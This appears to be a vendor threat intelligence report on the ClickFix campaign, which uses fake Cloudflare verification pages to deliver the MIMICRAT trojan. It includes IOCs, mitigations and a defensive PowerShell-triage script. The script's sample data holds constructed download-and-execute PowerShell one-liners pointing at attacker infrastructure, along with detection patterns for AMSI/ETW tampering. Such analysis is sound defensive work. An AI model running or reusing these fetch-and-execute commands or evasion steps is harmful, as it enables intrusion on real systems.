ClickFix Campaign Exploits Compromised Websites to Deliver MIMICRAT Remote Access Trojan Targeting Windows Systems
- Feb 22
- 5 min read

Executive Summary
The ClickFix campaign represents a significant escalation in the abuse of compromised legitimate websites to deliver advanced malware, culminating in the deployment of the custom MIMICRAT Remote Access Trojan. First identified by Elastic Security Labs and corroborated by multiple open-source intelligence channels, this campaign leverages a multi-stage infection chain, sophisticated defense evasion, and post-exploitation techniques that enable persistent access, credential theft, and covert network tunneling. The campaign’s global reach, targeting of higher education and financial sectors, and use of malleable command-and-control (C2) infrastructure underscore the urgent need for heightened vigilance and proactive defense measures across all organizations.
Threat Actor Profile
Attribution for the ClickFix campaign remains unconfirmed, but the operational sophistication, infrastructure reuse, and advanced tradecraft suggest a well-resourced and technically adept threat actor. The campaign’s use of multi-language lures, dynamic infrastructure, and custom malware tooling is consistent with tactics observed in advanced persistent threat (APT) operations. While no specific nation-state or criminal group has been definitively linked, the campaign’s targeting of universities, financial platforms, and global users indicates a broad operational mandate, likely motivated by both espionage and financial gain. The infrastructure and techniques overlap with those seen in other high-profile campaigns tracked by Huntress and Elastic Security Labs, suggesting either a shared toolkit or actor collaboration.
Technical Analysis of Malware/TTPs
The ClickFix campaign employs a multi-stage infection chain designed to maximize stealth and persistence while minimizing detection by traditional security controls.
Initial access is achieved through the compromise of legitimate websites such as bincheck.io and investonline.in, which serve as delivery infrastructure. Visitors are shown a fake Cloudflare verification page, the so-called "ClickFix" lure. Script on the page silently places a PowerShell command on the victim's clipboard, and the page instructs them to paste and run it, typically in the Windows Run dialog (Win+R) or a terminal. Because the browser never downloads a file, Mark-of-the-Web, SmartScreen download checks and proxy-side file inspection never see a payload; the lure instead trades on user trust in a familiar brand.
The infection chain unfolds as follows. The first stage is an obfuscated PowerShell one-liner that connects to the attacker-controlled domain xMRi.neTwOrk (IP: 45.13.212.250) to retrieve the next payload. The second stage is a larger PowerShell script that neutralizes Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI) by patching their entry points in the memory of the running PowerShell process, blinding endpoint detection and response (EDR) telemetry and script scanning from that point on. This script then downloads and executes a ZIP archive containing a custom Lua loader.
The third stage involves the Lua loader decrypting and executing an embedded Lua script, which in turn decodes and runs shellcode directly in memory. The shellcode, consistent with Meterpreter-family loaders, reflectively loads the final payload: MIMICRAT.
MIMICRAT is a custom Remote Access Trojan featuring malleable HTTP(S) C2 profiles, Windows token theft and impersonation, SOCKS5 proxy tunneling, and a 22-command dispatch table for post-exploitation. The malware is capable of lateral movement, credential harvesting, and establishing persistent, encrypted channels for data exfiltration and remote control.
The campaign’s technical sophistication is further evidenced by its use of Amazon CloudFront as a C2 relay, dynamic language localization in lures (supporting 17 languages), and the abuse of both compromised and attacker-controlled infrastructure for payload delivery and C2.
Exploitation in the Wild
The ClickFix campaign has been observed targeting a diverse set of victims, including a confirmed US-based university, Chinese-speaking users, and visitors to compromised financial platforms. The use of legitimate, high-traffic websites as delivery vectors increases the likelihood of successful infections and complicates attribution and remediation efforts.
Infection telemetry and open-source reporting indicate that the campaign remains active, with new infrastructure and payload variants appearing regularly. The clipboard-based PowerShell execution technique is particularly effective at bypassing traditional web and email security controls, as it relies on user action rather than automated download or execution.
The campaign’s post-exploitation activities include theft and impersonation of Windows access tokens (letting the operator act under the identity of other logged-on users), establishment of SOCKS5 proxies for covert network tunneling, and the use of malleable C2 profiles to blend malicious traffic with legitimate web communications. These capabilities enable the threat actor to maintain persistent access, move laterally within victim environments, and exfiltrate sensitive data with minimal risk of detection.
Victimology and Targeting
Analysis of available telemetry and public reporting suggests that the ClickFix campaign is opportunistic but exhibits a preference for high-value targets. Sectors affected include higher education (notably universities), financial services (via compromised investment platforms), and general internet users across multiple geographies.
The campaign’s use of multi-language lures and global infrastructure indicates a broad targeting scope, with confirmed victims in the United States, India, and China. The reliance on user interaction (copying and executing PowerShell commands) suggests that the campaign is designed to exploit both technical and social vulnerabilities, increasing its effectiveness against a wide range of organizations and individuals.
Mitigation and Countermeasures
Organizations are strongly advised to implement the following countermeasures to mitigate the risk posed by the ClickFix campaign and MIMICRAT malware:
Network and endpoint security teams should block and monitor all indicators of compromise (IOCs) associated with the campaign, including the domains xMRi.neTwOrk, WexMrI.CC, www.ndibstersoft.com, and d15mawx0xveem1.cloudfront.net, as well as the IP addresses 45.13.212.250, 45.13.212.251, and 23.227.202.114. Match domains case-insensitively (the actor's domains are published with mixed case, and DNS names are case-insensitive), and block the specific CloudFront distribution hostname rather than cloudfront.net as a whole, which carries a large volume of legitimate traffic. All URLs and file hashes listed in the IOCs section should be added to blocklists and monitored for access attempts.
Security operations centers should proactively hunt for PowerShell execution events with obfuscated command lines (hidden window, -EncodedCommand, Invoke-Expression fed by a web download), especially where the parent process is explorer.exe, which is what a command pasted into the Run dialog produces, or where the destination is the infrastructure listed above. A command run from the Run dialog is also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, a useful forensic artifact. Process-creation telemetry (Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing) and PowerShell script block logging (Event ID 4104) should be enabled; the process-creation record for the first stage is written before the second stage patches ETW inside the PowerShell process, so it survives that evasion. EDR solutions should be configured to alert on attempts to tamper with ETW or AMSI, as these are strong indicators of advanced malware activity.
Network monitoring should be enhanced to detect outbound HTTPS traffic to the listed C2 domains and to the specific CloudFront distribution hostname. Because CloudFront edge IP space is shared with legitimate services, detection must key on DNS queries and on the TLS SNI or HTTP Host header rather than on destination IP. Where TLS inspection is already deployed it allows matching on the content of the malleable C2 profile; deploying it solely for this campaign is rarely proportionate, since the hostname-level indicators are available without it.
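As an added example (not part of this report or of any referenced vendor's tooling), the following Python script applies the hunting and IOC-matching guidance of the two preceding paragraphs to constructed sample telemetry: it decodes -EncodedCommand arguments (base64 of UTF-16LE), scores PowerShell command lines with heuristic patterns, matches any host it finds against this report's IOCs case-insensitively (including subdomains), and flags connections by TLS SNI or listed IP rather than by CloudFront's shared edge addresses. The sample command lines, connections and placeholder addresses are constructed for this example, and the heuristic patterns and weights are assumptions to be tuned against your own baseline.

```python
import base64
import re

# IOCs from this report. Lower-cased once: DNS names are case-insensitive and the actor's
# domains are published with mixed case (xMRi.neTwOrk), so naive exact matching would miss them.
IOC_DOMAINS = {d.lower() for d in (
    "xMRi.neTwOrk", "WexMrI.CC", "www.ndibstersoft.com", "d15mawx0xveem1.cloudfront.net")}
IOC_IPS = {"45.13.212.250", "45.13.212.251", "23.227.202.114"}

# Heuristics for ClickFix-style PowerShell one-liners. Patterns and weights are assumptions
# made for this example, not detection content from the report.
HEURISTICS = [
    (r"-(?:w|win|windowstyle)\s+hidden", "hidden window", 2),
    (r"-(?:ep|executionpolicy)\s+bypass", "execution policy bypass", 2),
    (r"\b(?:iex|invoke-expression)\b", "Invoke-Expression", 3),
    (r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b", "web download", 3),
    (r"frombase64string|\[char\]\d+|-join\b|-replace\b", "string obfuscation", 2),
    (r"amsiscanbuffer|amsiinitfailed|amsiutils|etweventwrite", "AMSI/ETW tampering", 5),
]
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Candidate hosts: dotted names or IPv4 literals, with or without a scheme.
HOST_RE = re.compile(r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,}|\d{1,3}(?:\.\d{1,3}){3})", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None


def host_matches_ioc(host):
    """True for a listed IP, a listed domain, or any subdomain of a listed domain."""
    h = host.lower().rstrip(".")
    return h in IOC_IPS or any(h == d or h.endswith("." + d) for d in IOC_DOMAINS)


def triage_command_line(cmdline):
    """Score one PowerShell command line; a decoded payload is scanned alongside the raw line."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    low = text.lower()
    reasons, score = [], 0
    if decoded is not None:
        reasons.append("encoded command")
        score += 3
    for pattern, label, weight in HEURISTICS:
        if re.search(pattern, low):
            reasons.append(label)
            score += weight
    iocs = sorted({h.lower() for h in HOST_RE.findall(text) if host_matches_ioc(h)})
    if iocs:
        reasons.append("known IOC")
        score += 10
    return {"score": score, "reasons": reasons, "iocs": iocs, "decoded": decoded}


def scan_command_lines(lines):
    return [triage_command_line(line) for line in lines]


def flagged_connections(conns):
    """Flag on SNI hostname or listed IP; a shared CDN edge IP on its own is never an indicator."""
    return [(c["dst"], c["sni"]) for c in conns if host_matches_ioc(c["sni"]) or c["dst"] in IOC_IPS]


def _encode_ps(script):
    """Build an -EncodedCommand argument the way PowerShell expects it (sample construction only)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry for this example (not real captures).
SAMPLE_COMMAND_LINES = [
    'powershell.exe -w hidden -ep bypass -c "iex (irm http://xMRi.neTwOrk/verify)"',
    "powershell.exe -nop -w hidden -enc "
    + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://45.13.212.250/s2')"),
    "powershell.exe -NoProfile -File C:\\Scripts\\Backup.ps1",
]
SAMPLE_CONNECTIONS = [  # 203.0.113.0/24 (documentation range) stands in for shared CDN edge addresses
    {"dst": "203.0.113.10", "sni": "d15mawx0xveem1.cloudfront.net"},  # listed relay: alert
    {"dst": "203.0.113.10", "sni": "d111111abcdef8.cloudfront.net"},  # other tenant, same IP: no alert
    {"dst": "45.13.212.251", "sni": ""},                               # direct to listed IP: alert
]

if __name__ == "__main__":
    for result in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(f"score={result['score']:>2} iocs={result['iocs']} reasons={result['reasons']}")
    print("flagged connections:", flagged_connections(SAMPLE_CONNECTIONS))
```

The two design points worth carrying into a production rule are that the encoded payload is decoded before matching (an IOC hidden behind -EncodedCommand never appears in the raw command line) and that the CloudFront check keys on the distribution hostname, so the second connection, another tenant behind the same edge IP, is correctly left alone.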
The provided YARA rule for MIMICRAT should be deployed across all endpoints and memory scanning solutions to facilitate early detection of the malware in both file and memory contexts.
User awareness training should emphasize the risks of executing commands copied from websites, even those purporting to be legitimate verification steps. Application control (allowlisting with AppLocker or WDAC) and restricting PowerShell for non-administrators, in particular Constrained Language Mode, which blocks the arbitrary .NET type access that in-memory AMSI and ETW patching from PowerShell depends on, further reduce the attack surface. Where business processes allow it, removing the Run dialog via Group Policy (User Configuration > Administrative Templates > Start Menu and Taskbar > "Remove Run menu from Start Menu") closes the most common ClickFix execution path.
Least-privilege access controls limit what a stolen token is worth: administrators should not browse the web from privileged accounts, and service accounts should not hold interactive logon rights. Keep AMSI-aware security products current, and confirm that script block logging and ETW-based telemetry are actually being collected and forwarded, since MIMICRAT's loader targets exactly those controls.
References
- Elastic Security Labs: MIMICRAT Analysis
- The Hacker News: ClickFix Campaign Abuses Compromised Sites
- Reddit: BlueTeamSec Discussion
- LinkedIn: Aaron Payne's Post
- MITRE ATT&CK: Technique Matrix
- VirusTotal: Relations for IOCs
About Rescana
Rescana delivers next-generation Third-Party Risk Management (TPRM) solutions, empowering organizations to continuously monitor, assess, and mitigate cyber risks across their extended supply chain. Our platform leverages advanced threat intelligence, automation, and analytics to provide actionable insights and ensure robust cyber resilience. For questions or further information, we are happy to assist at ops@rescana.com.